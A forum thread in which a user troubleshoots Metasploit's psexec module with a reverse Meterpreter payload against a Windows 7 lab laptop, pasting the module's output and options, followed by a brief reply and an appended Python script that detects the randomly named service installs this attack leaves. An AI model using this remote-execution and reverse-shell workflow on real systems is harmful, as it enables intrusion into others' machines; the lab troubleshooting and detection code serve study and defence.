
Thread: Unable to fully execute "psexec" on Win7 target

  1. #1
    Just burned his ISO
    Join Date
    Jan 2011
    Plaisance, LA USA


    I've been playing around with the "exploit/windows/smb/psexec" in metasploit with a reverse meterpreter as my payload. I've been able to successfully execute this "exploit" on VMware XP and Vista boxes with no problems; however, when I attempt this on two separate laptops (Attacker: BT4 R2 & Target: Win7), I am unable to get a session. UAC is disabled and my Win7 user is running as an administrator. I set up both computers myself side-by-side so I know the credentials are correct, but I receive the following output:

    msf exploit(psexec) > exploit
    [*] Started HTTPS reverse handler on
    [*] Connecting to the server...
    [*] Authenticating to|WORKGROUP as user 'TEST_USER'...
    [*] Uploading payload...
    [*] Created \xaFTFQQZ.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (LIxwwLpb - "MGUIXQycc")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Removing the service...
    [*] Closing service handle...
    [*] Deleting \xaFTFQQZ.exe...
    [*] Exploit completed, but no session was created.
    Here are my options:
    msf exploit(psexec) > show options
    Module options (exploit/windows/smb/psexec):
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       RHOST      yes       The target address
       RPORT      445              yes       Set the SMB service port
       SMBPass    password         no        The password for the specified username
       SMBUser    TEST_USER        no        The username to authenticate as
    Payload options (windows/meterpreter/reverse_tcp):
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, none, process
       LHOST     yes       The listen address
       LPORT     4444             yes       The listen port
    Exploit target:
       Id  Name
       --  ----
       0   Automatic
    Any thoughts?

    *Edit: The output shows "HTTPS reverse handler" instead of reverse_tcp as in options because I tried switching payloads (to no avail). The result is the same.

  2. #2
    Senior Member voidnecron's Avatar
    Join Date
    May 2010

    Re: Unable to fully execute "psexec" on Win7 target

    Even with UAC disabled and the user being admin, you still need to do 'Run as Administrator' to do certain things, i.e. if you start a command prompt normally you wouldn't be able to run netsh, since this requires higher privs.
    If you run the command prompt with "Run as Administrator" you would be able to do so.
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."
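
Seen from the target's side, the sequence in the module output in post #1 (a randomly named executable uploaded, then a randomly named service created, started and removed) leaves a Service Control Manager "service installed" record (event ID 7045) in the System log. The following is an added example, not part of the original thread and not Metasploit code: a small check that flags such installs. The event records are constructed, and the host name and the `%SYSTEMROOT%` location of the executable are assumptions.

```python
import re

# Constructed sample: Service Control Manager "service installed" records
# (System log, event ID 7045), reduced to the fields this check uses.
# The first record reuses the service and file names from the module output;
# its %SYSTEMROOT% location and the host name are assumptions.
EVENTS = [
    {"event_id": 7045, "host": "WIN7-LAB", "service_name": "LIxwwLpb",
     "image_path": r"%SYSTEMROOT%\xaFTFQQZ.exe"},
    {"event_id": 7045, "host": "WIN7-LAB", "service_name": "MpsSvc",
     "image_path": r"C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork"},
    {"event_id": 7045, "host": "WIN7-LAB", "service_name": "BackupAgent",
     "image_path": r"C:\Windows\bkagent.exe"},
    {"event_id": 7036, "host": "WIN7-LAB", "service_name": "Spooler",
     "image_path": ""},
]

# An .exe sitting directly in the Windows directory, letters-only base name.
ROOT_EXE = re.compile(r"(?:%SYSTEMROOT%|[A-Za-z]:\\Windows)\\([A-Za-z]+)\.exe",
                      re.IGNORECASE)

def looks_random(token):
    """Crude heuristic: 6-12 letters, few vowels, and a case change after the
    first character (so plain words and Capitalised names do not match)."""
    if not re.fullmatch(r"[A-Za-z]{6,12}", token):
        return False
    vowels = sum(c in "aeiouAEIOU" for c in token)
    flips = sum(a.islower() != b.islower() for a, b in zip(token[1:], token[2:]))
    return vowels / len(token) <= 0.25 and flips >= 1

def suspicious_installs(events):
    """Return (host, service, image path) for installs where BOTH the service
    name and the executable name look random; either signal alone is noisy."""
    hits = []
    for ev in events:
        if ev["event_id"] != 7045:
            continue
        m = ROOT_EXE.fullmatch(ev["image_path"])
        if m and looks_random(ev["service_name"]) and looks_random(m.group(1)):
            hits.append((ev["host"], ev["service_name"], ev["image_path"]))
    return hits

if __name__ == "__main__":
    for hit in suspicious_installs(EVENTS):
        print("review service install:", *hit)
```

The `MpsSvc` record shows why both signals are required: its name alone trips the randomness heuristic, but its image path is the normal `svchost.exe` one, so it is not reported.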
